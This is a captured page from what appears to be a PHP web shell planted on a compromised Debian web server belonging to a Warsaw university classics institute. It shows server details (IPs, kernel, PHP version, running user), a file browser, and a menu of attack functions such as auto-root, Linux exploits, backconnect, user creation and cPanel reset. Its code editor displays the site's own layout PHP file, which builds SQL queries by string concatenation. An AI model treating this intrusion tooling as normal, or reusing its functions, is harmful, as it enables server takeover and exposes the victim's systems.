Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.22.79.165
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
protected /
Layouts /
[ HOME SHELL ]
Name
Size
Permission
Action
AdminLayout.php
1.87
KB
-rw-r--r--
AdminLayout.tpl
3.6
KB
-rw-r--r--
LoginLayout.php
954
B
-rw-r--r--
LoginLayout.tpl
3.37
KB
-rw-r--r--
MainLayout.php
5.07
KB
-rw-r--r--
MainLayout.tpl
19.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MainLayout.php
<?php class MainLayout extends TTemplateControl { public function onLoad($p) { parent::onLoad($p); $this->bindMainMenu(); $this->bindStudentNews(); $this->bindNewestBooks(); $this->bindRightBoxes(); $this->Page->Title = "Instytut Filologii Klasycznej Uniwersytetu Warszawskiego"; $titlePrefix = $this->Page->getTitlePrefix(); if (! empty($titlePrefix)) $this->Page->Title = $titlePrefix . " - " . $this->Page->Title; } public function bindMainMenu() { $crit = new TActiveRecordCriteria(); $crit->OrdersBy['sort_pos'] = 'asc'; $crit->Condition = "menu_item = -1 AND lang = '" . $this->Page->Lang . "'"; $this->menuItems->setDataSource(KContentItem::finder()->findAll($crit)); $this->menuItems->dataBind(); } public function bindStudentNews() { $crit = new TActiveRecordCriteria(); $crit->OrdersBy['added_date'] = "desc"; $crit->Condition = "lang = '" . $this->Page->getLang() . "' and type=" . KNewsItem::TYPE_STUDENT; // $crit->Limit = "10"; // $this->StudentNews->setDataSource(KNewsItem::finder()->findAll($crit)); // a$this->StudentNews->dataBind(); } public function bindRightBoxes() { if (!$this->rightColumnHide()) { $crit = new TActiveRecordCriteria(); $crit->OrdersBy['sort_pos'] = "asc"; $this->RightBoxList->setDataSource(KRightBox::finder()->findAll($crit)); $this->RightBoxList->dataBind(); } } public function setLang($sender, $param) { $lang = $param->CommandParameter; $this->Session['ifklang'] = $lang; $this->Response->redirect($this->Application->Parameters['BASE_URL']); } public function fillSubMenu($sender, $param) { $crit = new TActiveRecordCriteria(); $crit->Condition = "lang = '" . $this->Page->Lang . "' AND menu_item = " . $param->Item->Data->id; $crit->OrdersBy['sort_pos'] = 'asc'; $param->Item->subMenuItems->setDataSource(KContentItem::finder()->findAll($crit)); $param->Item->subMenuItems->dataBind(); } public function headerHide() { return $this->Page->PagePath === 'Front.Error404' || $this->Page->PagePath === 'Front.Login' || $this->Page->PagePath === 'Front.AccessibilityDeclaration' ; } public function leftColumnHide() { return ($this->Page->PagePath === 'Front.Error404') || $this->Page->PagePath === 'Front.BookList' || $this->Page->PagePath === 'Front.Login' || $this->Page->PagePath === 'Front.Schedule' || $this->Page->PagePath === 'Front.AccessibilityDeclaration'; } public function rightColumnHide() { return $this->Page->PagePath === 'Front.Login' || ($this->Page->PagePath === 'Front.Error404') || ($this->Page->PagePath === 'Front.Schedule') || ($this->Page->PagePath === 'Front.PersonDetails') || ($this->Page->PagePath === 'Front.ContentItem' && ($this->Request['cid'] == 24 || $this->Request['cid'] == 26 || $this->Request['cid'] == 46)) || $this->Page->PagePath === 'Front.AccessibilityDeclaration'; } public function validatePassword($sender, $param) { $authManager = $this->Application->getModule('auth'); if (! $authManager->login(strtolower($this->FEmail->Text), $this->FPass->Text)) $param->IsValid = false; } public function validateActivity($sender, $param) { if ($this->Page->IsValid) { $user = KUserRecord::finder()->findByEmail($this->FEmail->Text); if (! $user->active) $param->IsValid = false; } } public function redirectToAdminPanel($sender, $param) { // if ($this->Page->IsValid) { /*if ($this->User->getRole() == 2) $this->Response->redirect($this->Service->constructUrl('Admin.UserEdit', array( 'uid' => $this->User->id ))); else*/ $this->Response->redirect($this->Service->constructUrl('Admin.Home')); // } } public function commitSearch($sender, $param) { $this->Response->redirect($this->Service->constructUrl('Front.Search', array( 'q' => $this->TopLinksSearchBox->SafeText ))); } public function commitSearch2($sender, $param) { $this->Response->redirect($this->Service->constructUrl('Front.Search', array( 'q' => $this->TopLinksSearchBox2->SafeText ))); } public function bindNewestBooks() { $crit = new TActiveRecordCriteria(); $crit->Condition = "type = " . KPaper::PUBTYPE_BOOK . " and LENGTH(title)>2"; $crit->OrdersBy["year"] = "DESC"; $crit->OrdersBy['added_date'] = "DESC"; $crit->Limit = "6"; if ($this->Page->PagePath !== 'Front.PersonDetails') { $this->NewestBooks->setDataSource(KPaper::finder()->findAll($crit)); $this->NewestBooks->dataBind(); } } } ?>
Close